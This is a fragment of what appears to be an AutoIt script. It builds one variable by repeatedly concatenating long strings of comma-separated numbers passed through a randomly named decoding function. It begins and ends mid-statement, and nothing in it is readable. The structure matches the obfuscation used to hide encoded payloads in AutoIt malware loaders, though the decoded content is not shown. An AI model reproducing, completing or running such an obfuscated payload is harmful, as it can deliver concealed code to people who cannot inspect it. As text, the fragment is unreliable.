("56,54,56,56,56,54,57,57,56,54,57,57,56,60,56,60,57,57,56,53,56,6,56,55,57,57,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,55,57,57,56,56,57,58,56,54,57,55,56,54,57,54,57,57,56,53,56,6,56,55,57,57,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,53,56,53,56,54,57,55,56,56,56,56,56,54,57,57,57,57,56,53,56,6,56,55,57,56,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,53,56,57,56,55,57,57,56,54,57,55,57,57,56,53,56,6,56,55,57,56,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,53,56,56,56,54,56,56,56,54,57,57,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,57,57,57,56,53,56,6,56,55,57,56,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,58,57,55,56,54,56,56,56,54,57,57,56,54,57,57,56,6,56,6,56,6,56,55,57,56,57,57,57,54,57,55,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,56,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,55,57,57,56,56,57,58,56,54,57,55,56,54,57,54,57,57,56,53,56,6,56,55,57,56,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,53,56,53,56,54,57,55,56,56,56,56,56,54,57,57,57,57,56,53,56,6,56,55,57,55,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,57,56,53,56,57,56,55,57,57,56,54,56,59,57,57,56,53,56,6,56,55,57,55,56,56,57,54,57,56,57,54,57,54,57,54,57,54,56,54,56,56,56,53,56,54,56,54,56,59,56,53,56,60,57,57,56,53,56,6,56,55,57,55,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,54,56,5,56,57,56,57,56,57,56,58,56,58,57,55,57,57,56,53,56,6,56,55,57,55,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,54,56,56,56,54,57,57,56,54,57,57,56,60,56,60,57,57,56,53,56,6,56,55,56,59,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,55,57,57,56,56,57,58,56,54,57,55,56,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,57,56,53,56,6,56,55,56,59,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,53,56,53,56,54,57,55,56,56,56,56,56,54,57,57,57,57,56,53,56,6,56,55,56,59,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,53,56,57,56,55,57,57,56,54,57,58,57,57,56,53,56,6,56,55,56,58,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,58,56,54,57,55,56,54,56,55,57,57,56,53,56,6,56,55,56,58,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,57,56,57,56,57,56,58,56,58,57,55,57,57,56,53,56,6,56,55,56,58,56,6" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,55,57,54,57,54,57,54,57,54,56,54,56,56,56,54,57,57,56,54,57,57,56,60,56,60,57,57,56,53,56,6,56,55,56,53,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,55,57,57,56,56,57,58,56,54,57,55,56,54,57,54,57,57,56,53,56,6,56,55,56,53,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,53,56,53,56,54,57,55,56,56,56,56,56,54,57,57,57,57,56,53,56,6,56,55,56,53,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,53,56,57,56,55,57,57,56,53,56,55,57,57,56,53,56,6,56,55,56,6,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("53,56,57,56,54,56,55,56,53,56,58,56,57,56,57,57,57,56,53,56,6,56,55,56,6,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,57,56,58,56,58,57,55,56,54,56,56,56,54,57,57,56,54,56,54,57,57,56,53,56,6,56,55,56,6,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,60,56,60,57,57,56,53,56,6,56,55,57,55,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,55,57,57,56,56,57,58,56,54,57,55,56,54,57,54,57,57,56,53,56,6,56,55,57,55,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,53,56,53,56,54,57,55,56,56,56,56,56,54,57,57,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,53,56,6,56,55,57,55,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,53,56,57,56,55,57,57,56,56,57,54,57,57,56,53,56,6,56,55,57,55,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,54,56,55,56,57,56,57,56,57,56,58,57,57,56,53,56,6,56,55,57,54,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,58,57,55,56,54,56,56,56,54,57,57,56,54,57,57,56,6,56,6,56,6,56,55,57,54,56,56,57,54,57,55,57,54,57,54,57,54,57,54,57,57,56,53,56,56,56,55,57,56,57,57,56,53,56,55,56,53,56,57,56,54,56,55,56,53,56,58,57,57,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("53,56,56,56,55,57,55,56,60,56,57,56,57,56,57,56,58,56,58,57,55,56,54,56,56,56,54,56,54,57,57,56,53,56,56,56,55,57,55,56,56,56,54,57,57,56,54,57,57,56,6,56,6,56,56,56,55,57,55,56,54,57,57,56,53,56,6,56,55,57,54,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,57,54,56,53,56,60,57,57,56,53,56,6,56,55,57,54,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,54,56,55,56,54,57,55,56,56,57,58,56,54,56,55,56,54,56,54,57,57,56,53,56,6,56,55,56,60,56,60,57,54,57,54,57,54,57,54,57,54,57,54,56,53,56,5" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,60,56,60,57,57,56,53,56,6,56,55,57,57,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,55,56,59,56,53,56,55,57,57,56,53,56,6,56,55,57,57,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,58,56,53,56,5,56,55,56,54,57,57,56,53,56,6,56,55,57,57,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,59,56,54,57,57,56,53,56,55,56,54,56,55,57,57,56,53,56,6,56,55,57,57,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,56,57,58,56,54,56,55,56,53,56,5,56,60,56,60,57,57,56,53,56,6,56,55,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,56,55,56,54,57,55,57,57,56,53,56,6,56,55,56,56,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,55,56,54,57,56,56,54,56,55,56,53,56,58,57,57,56,53,56,6,56,55,56,56,56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,59,56,53,56,56,56,54,56,55,56,56,57,58,56,54,56,54,57,57,56,53,56,6,56,55,56,56,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,5,56,6,56,6,56,6,56,55,56,56,57,55,57,54,57,57,57,54,57,54,57,54,57,54,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,53,56,56,56,55,56,5,56,60,56,54,57,56,56,54,56,55,56,54,57,56,56,54,56,57,56,54,56,54,57,57,56,53,56,56,56,55,56,5,56,56,56,53,56,60,56,53,56,5,56,6,56,6,56,56,56,55,56,5,56,54,57,57,56,53,56,6,56,55,56,58,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,56,56,57,56,53,56,58,56,53,56,5,56,53,56,60,57,57,56,53,56,6,56,55,56,58,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,53,56,56,56,56,56,59,56,54,56,57,56,53,56,59,57,57,56,53,56,6,56,55,56,58,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,53,56,55,56,54,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("5,56,53,56,58,56,54,56,55,57,57,56,53,56,6,56,55,56,58,57,57,57,54,57,59,57,54,57,54,57,54,57,54,56,56,56,57,56,54,57,54,56,54,57,55,56,53,56,56,57,57,56,53,56,6,56,55,56,57,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,6,56,53,56,56,56,55,56,53,56,6,56,6,56,6,56,55,56,57,56,56,57,54,57,59,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,60,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,56,56,57,56,53,56,58,56,53,56,5,56,53,56,60,57,57,56,53,56,6,56,55,56,60,56,56,57,54,57,57,57,54,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,54,56,53,56,56,56,56,56,57,56,53,56,58,56,54,56,55,57,57,56,53,56,6,56,55,56,60,56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,59,56,53,56,56,56,54,56,55,56,56,56,6,57,57,56,53,56,6,56,55,56,60,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,59,56,53,56,57,56,54,56,6,56,60,56,60,57,57,56,53,56,6,56,55,56,59,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,56,56,57,56,53,56,58,56,53,56,5,56,53,56,60,57,57,56,53,56,6,56,55,56,59,56,56,57,54,57,56,57,54,57,54,57,54,57,54,56,53,56,56,56,56,56,6,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,56,59,56,53,56,57,57,57,56,53,56,6,56,55,56,59,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,54,56,6,56,56,56,56,56,54,56,59,56,53,56,56,56,54,56,54,57,57,56,53,56,6,56,55,56,59,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,54,56,59,56,60,56,60,57,57,56,53,56,6,56,55,56,54,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,56,56,57,56,53,56,58,56,53,56,5,56,53,56,60,57,57,56,53,56,6,56,55,56,54,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,56,56,56,56,56,56,54,56,55,56,53,56,58,57,57,56,53,56,6,56,55,56,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,5,56,53,56,54,56,54,56,55,56,56,57,58,56,54,56,54,57,57,56,53,56,6,56,55,56,54,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,5,56,6,56,6,56,6,56,55,56,54,57,55,57,54,57,57,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,53,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,56,56,57,56,53,56,58,56,53,56,5,56,53,56,60,57,57,56,53,56,6,56,55,56,53,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,53,56,56,56,56,56,56,56,54,56,55,56,53,56,57,57,57,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("53,56,6,56,55,56,53,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,53,56,56,56,53,56,58,56,54,57,54,56,53,56,5,57,57,56,53,56,6,56,55,56,53,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,56,56,6,56,54,56,59,56,53,56,57,56,54,56,6,56,6,56,6,56,6,56,55,56,6,56,60,57,54,57,58,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,57,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,56,56,57,56,53,56,58,56,53,56,5,56,53,56,60,57,57,56,53,56,6,56,55,57,57,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,53,56,56,56,56,56,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,54,56,55,56,54,56,57,57,57,56,53,56,6,56,55,57,56,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,53,56,58,56,53,56,5,56,53,56,60,56,53,56,56,56,6,56,6,56,6,56,55,57,56,56,56,57,54,57,56,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,59,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,56,56,57,56,53,56,58,56,53,56,5,56,53,56,60,57,57,56,53,56,6,56,55,56,59,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,56,56,56,56,56,56,54,56,55,56,53,56,57,57,57,56,53,56,6,56,55,56,59,56,6,57,54,57,57,57,54,57,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,54,56,53,56,56,56,53,56,58,56,54,57,54,56,53,56,5,57,57,56,53,56,6,56,55,56,59,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,56,57,58,56,54,56,55,56,53,56,5,56,60,56,60,57,57,56,53,56,6,56,55,57,56,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,56,56,57,56,53,56,58,56,53,56,5,56,53,56,60,57,57,56,53,56,6,56,55,57,56,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,53,56,56,56,55,56,58,56,54,56,55,56,54,57,57,57,57,56,53,56,6,56,55,57,56,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,55,56,54,56,59,56,53" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,57,56,54,56,55,57,57,56,53,56,6,56,55,57,56,57,57,57,54,57,59,57,54,57,54,57,54,57,54,56,56,56,57,56,54,57,54,56,54,57,55,56,53,56,56,57,57,56,53,56,6,56,55,57,55,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,6,56,53,56,56,56,60,56,60,57,57,56,53,56,6,56,55,57,59,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,55,56,58,56,54,56,55,57,57,56,53,56,6,56,55,57,59,57,57,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,59,56,54,56,56,56,55,56,54,56,54,56,5,57,57,56,53,56,6,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("55,57,58,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,53,56,58,56,53,56,56,56,53,56,55,56,54,56,59,57,57,56,53,56,6,56,55,57,58,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,54,57,57,56,56,57,56,56,54,56,55,56,54,57,56,57,57,56,53,56,6,56,55,57,58,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,54,57,54,56,53,56,58,56,53,56,5,56,60,56,60,57,57,56,53,56,56,56,55,57,59,56,6,56,56,57,57,56,54,57,54,56,54,56,59,56,54,56,56,57,57,56,53,56,56,56,55,57,59,57,57,56,56,57,57,56,54,56,5,56,54,56,58,56,53,56,58,57,57,56,53" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,56,56,55,57,58,56,60,56,54,56,59,56,53,56,58,56,53,56,5,56,56,56,59,56,6,56,6,56,56,56,55,57,58,56,56,57,57,56,53,56,6,56,55,56,56,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,56,56,53,56,54,56,55,56,53,56,56,56,55,56,60,57,57,56,53,56,6,56,55,56,56,57,57,57,54,57,54,57,54,57,54,57,54,57,54,56,53,56,58,56,54,57,54,56,54,56,57,56,56,56,59,57,57,56,53,56,6,56,55,56,55,56,60,57,54,57,54,57,54,57,54,57,54,57,54,56,54,56,56,56,54,56,56,56,53,56,58,56,54,56,55,56,54,56,54,57,57,56,53,56,6,56,55,56,55,56,56,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,54,57,54,57,54,57,54,57,54,56,53,56,57,56,53,56,57,56,6,56,6,56,6,56,55,56,55,56,54,57,54,57,54,57,54,57,54,57,54,57,54,57,57,56,53,56,56,56,55,57,55,57,57,56,54,56,59,56,54,56,56,56,53,56,54,56,54,56,59,57,57,56,53,56,56,56,55,57,54,56,60,56,53,56,60,56,54,56,5,56,57,56,57,56,57,56,58,57,57,56,53,56,56,56,55,57,54,56,56,56,58,57,55,56,54,56,56,56,54,57,57,56,54,57,57,56,6,56,6,56,56,56,55,57,54,56,6,57,57,56,53,56,6,56,55,56,58,56,6,57,54,57,54,57,54,57,54,57,54,57,54,56,54,57,57,56,53,56,57,56,53" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,56,56,53,56,58,57,57,56,53,56,6,56,55,56,58,57,57,57,54,57,54,57,54,57,54,57,54,57,54,56,54,57,57,56,54,56,55,56,54,57,55,56,55,56,53,56,6,56,6,56,6,56,55,56,57,56,60,57,54,57,54,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,56,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,55,56,60,56,53,56,58,57,57,56,53,56,6,56,55,57,56,57,57,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,54,56,53,56,56,56,54,56,55,56,54,56,57,57,57,56,53,56,6,56,55,57,55,56,60,57,54,56,5,57,54,57,54,57,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,56,53,56,56,56,55,56,54,56,54,56,5,56,53,56,58,57,57,56,53,56,6,56,55,57,55,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,53,56,56,56,53,56,55,56,54,56,59,56,54,57,57,57,57,56,53,56,6,56,55,57,55,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,56,57,56,56,54,56,55,56,54,57,56,56,54,57,54,56,54,56,54,57,57,56,53,56,6,56,55,57,55,57,57,57,54,56,5,57,54,57,54,57,54,57,54,56,53,56,58,56,53,56,5,56,6,56,6,56,6,56,55,57,55,57,55,57,54,56,5,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,54,57,57,57,54,57,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,54,57,54,57,54,56,56,56,54,56,53,56,58,56,54,56,55,56,54,56,55,57,57,56,53,56,6,56,55,56,53,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,58,56,54,56,55,56,53,56,57,56,54,57,54,57,57,56,53,56,6,56,55,56,53,56,56,57,54,57,56,57,54,57,54,57,54,57,54,56,53,56,55,56,53,56,58,56,54,56,57,56,54,56,55,56,6,56,6,56,6,56,55,56,53,56,6,57,54,57,56,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,55,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,56,56,57,56,53,56,58,56,54,56,55,56,54,56,59,57,57,56,53,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,56,55,56,55,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,56,56,54,56,55,56,55,56,60,56,53,56,58,57,57,56,53,56,6,56,55,56,55,56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,54,57,54,56,54,56,57,56,54,56,55,56,53,56,57,56,54,56,54,57,57,56,53,56,6,56,55,56,55,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,57,56,55,56,53,56,6,56,6,56,6,56,55,56,55,57,55,57,54,57,57,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,56,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,58,56,53,56,56,56,54,57,57,56,55" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,59,57,57,56,53,56,6,56,55,57,56,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,58,56,54,57,54,56,56,57,56,57,57,56,53,56,6,56,55,57,56,56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,55,56,54,57,56,56,54,57,54,56,53,56,58,56,54,56,54,57,57,56,53,56,6,56,55,57,56,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,5,56,60,56,60,57,57,56,53,56,6,56,55,56,60,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,55,56,56,56,54,56,55,57,57,56,53,56,6,56,55,56,59,56,60,57,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("58,57,54,57,54,57,54,57,54,56,53,56,58,56,54,57,56,56,54,56,5,56,54,57,55,57,57,56,53,56,6,56,55,56,59,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,59,56,53,56,56,56,54,56,55,56,55,56,60,57,57,56,53,56,6,56,55,56,59,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,53,56,58,56,54,57,54,56,54,56,57,56,54,56,55,56,54,56,54,57,57,56,53,56,6,56,55,56,59,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,53,56,57,56,53,56,57,56,6,56,6,56,6,56,55,56,59,57,55,57,54,57,58,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,55,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,55,56,53,56,53,56,58,57,57,56,53,56,6,56,55,56,55,56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,5,56,53,56,56,56,54,56,55,56,55,56,54,57,57,56,53,56,6,56,55,56,55,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,5,56,53,56,58,56,53,56,56,56,53,56,55,57,57,56,53,56,6,56,55,56,55,57,57,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,59,56,54,57,57,56,56,57,56,56,54,56,55,57,57,56,53,56,6,56,55,56,54,56,60,57,54,57,59,57,54,57,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,54,56,54,57,56,56,54,57,54,56,53,56,58,56,53,56,5,56,6,56,6,56,6,56,55,56,54,56,56,57,54,57,59,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,54,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,55,57,59,56,53,56,53,56,55,56,55,56,54,57,55,57,57,56,53,56,6,56,55,56,54,57,57,57,54,57,59,57,54,57,54,57,54,57,54,56,54,57,56,56,54,56,59,56,53,56,60,56,55,56,54,57,57,56,53,56,6,56,55,56,53,56,60,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,5,56,54,56,55,56,53,56,53,56,56,57,54,57,57,56,53,56,6,56,55,56,53" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,56,57,54,57,59,57,54,57,54,57,54,57,54,56,54,56,54,56,55,56,57,56,54,56,55,56,54,56,57,57,57,56,53,56,6,56,55,56,53,56,6,57,54,57,59,57,54,57,54,57,54,57,54,56,53,56,56,56,54,56,5,56,54,57,54,56,54,57,55,56,6,56,6,56,6,56,55,56,53,57,57,57,54,57,59,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,58,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,55,56,58,56,54,56,55,57,57,56,53,56,6,56,55,56,58,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,57,56,53,56,55,56,54,57,56,56,54,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("55,57,57,56,53,56,6,56,55,56,58,56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,56,56,54,56,6,56,53,56,58,56,54,56,55,56,54,56,54,57,57,56,53,56,6,56,55,56,58,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,59,56,54,56,56,56,6,56,6,56,6,56,55,56,58,57,55,57,54,57,57,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,55,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,55,56,57,56,54,56,55,57,57,56,53,56,6,56,55,56,54,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,53,56,56,56,56,56,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,54,57,54,56,54,57,55,57,57,56,53,56,6,56,55,56,54,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,53,56,56,56,54,56,55,56,53,56,6,56,53,56,56,57,57,56,53,56,6,56,55,56,54,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,56,56,54,56,6,56,53,56,58,56,54,56,55,56,54,56,54,57,57,56,53,56,6,56,55,56,54,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,59,56,54,56,56,56,6,56,6,56,6,56,55,56,54,57,55,57,54,57,58,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,57,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,57,55,56,53,56,56,56,56,56,53,56,54,56,55,57,57,56,53,56,6,56,55,56,57,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,53,56,56,56,56,56,57,56,54,57,54,56,54,57,55,57,57,56,53,56,6,56,55,56,57,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,53,56,56,56,54,56,55,56,53,56,6,56,53,56,56,57,57,56,53,56,6,56,55,56,56,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,55,56,56,56,54,56,6,56,53,56,58,56,54,56,55,56,54,56,54,57,57,56,53,56,6,56,55,56,56,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,59,56,54,56,56,56,6" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,6,56,6,56,55,56,56,56,54,57,54,57,58,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,58,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,57,56,56,54,56,59,57,57,56,53,56,6,56,55,56,58,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,53,56,60,56,55,56,54,56,54,56,5,56,54,56,55,57,57,56,53,56,6,56,55,56,58,56,6,57,54,57,58,57,54,57,54,57,54,57,54,56,53,56,53,56,56,57,54,56,54,56,54,56,55,56,57,57,57,56,53,56,6,56,55,56,58,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,55,56,54,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,56,53,56,56,56,54,56,5,56,54,56,54,57,57,56,53,56,6,56,55,56,57,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,54,57,54,56,54,57,55,56,6,56,6,56,6,56,55,56,57,56,58,57,54,57,58,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,55,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,56,57,56,53,56,58,57,57,56,53,56,6,56,55,57,55,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,55,56,54,56,59,56,53,56,56,56,54,56,55,57,57,56,53,56,6,56,55,57,55,56,6,57,54,57,58,57,54,57,54,57,54,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,55,56,57,56,54,56,55,56,54,56,57,56,53,56,56,57,57,56,53,56,6,56,55,57,55,57,57,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,5,56,54,57,54,56,54,57,55,56,60,56,60,57,57,56,53,56,6,56,55,56,57,57,57,57,54,56,5,57,54,57,54,57,54,57,54,56,56,56,55,56,53,56,6,56,53,56,60,56,54,56,59,57,57,56,53,56,6,56,55,56,56,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,55,56,54,56,56,56,56,56,55,56,54,57,55,57,57,56,53,56,6,56,55,56,56,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,53,56,54,56,54,56,5,56,53,56,58,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,54,57,57,56,53,56,6,56,55,56,56,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,55,56,54,57,56,56,54,56,55,56,54,57,55,57,57,56,53,56,6,56,55,56,56,57,57,57,54,56,5,57,54,57,54,57,54,57,54,56,53,56,56,56,55,56,57,56,53,56,56,56,53,56,58,57,57,56,53,56,6,56,55,56,55,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,54,56,5,56,54,57,55,56,54,56,53,56,53,56,57,56,54,56,54,57,57,56,53,56,6,56,55,56,55,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,55,56,53,56,60,56,60,57,57,56,53,56,6,56,55,57,54,56,6,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,59,57,54,57,54,57,54,57,54,56,56,56,53,56,54,56,55,56,53,56,56,56,56,57,56,57,57,56,53,56,6,56,55,57,54,57,57,57,54,57,59,57,54,57,54,57,54,57,54,56,54,57,54,56,54,56,56,56,53,56,55,56,54,57,57,57,57,56,53,56,6,56,55,56,60,56,60,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,55,56,56,56,54,56,54,56,5,56,54,57,57,57,57,56,53,56,6,56,55,56,60,56,56,57,54,57,58,57,54,57,54,57,54,57,54,56,54,56,55,56,56,57,55,56,54,56,59,56,54,57,56,56,54,56,54,57,57,56,53,56,6,56,55,56,60,56,6,57,54,57,58,57,54,57,54,57,54,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,56,54,56,55,56,56,56,59,56,6,56,6,56,6,56,55,56,60,57,59,57,54,57,58,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,57,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,55,56,59,56,53,56,55,57,57,56,53,56,6,56,55,57,57,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,58,56,53,56,5,56,56,56,5,57,57,56,53,56,6,56,55,57,57,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,55,56,54,56,54,56,54,57,54,56,53,56,58,57,57,56,53,56,6,56,55,57,57,57,57,57,54,56,5,57,54,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA 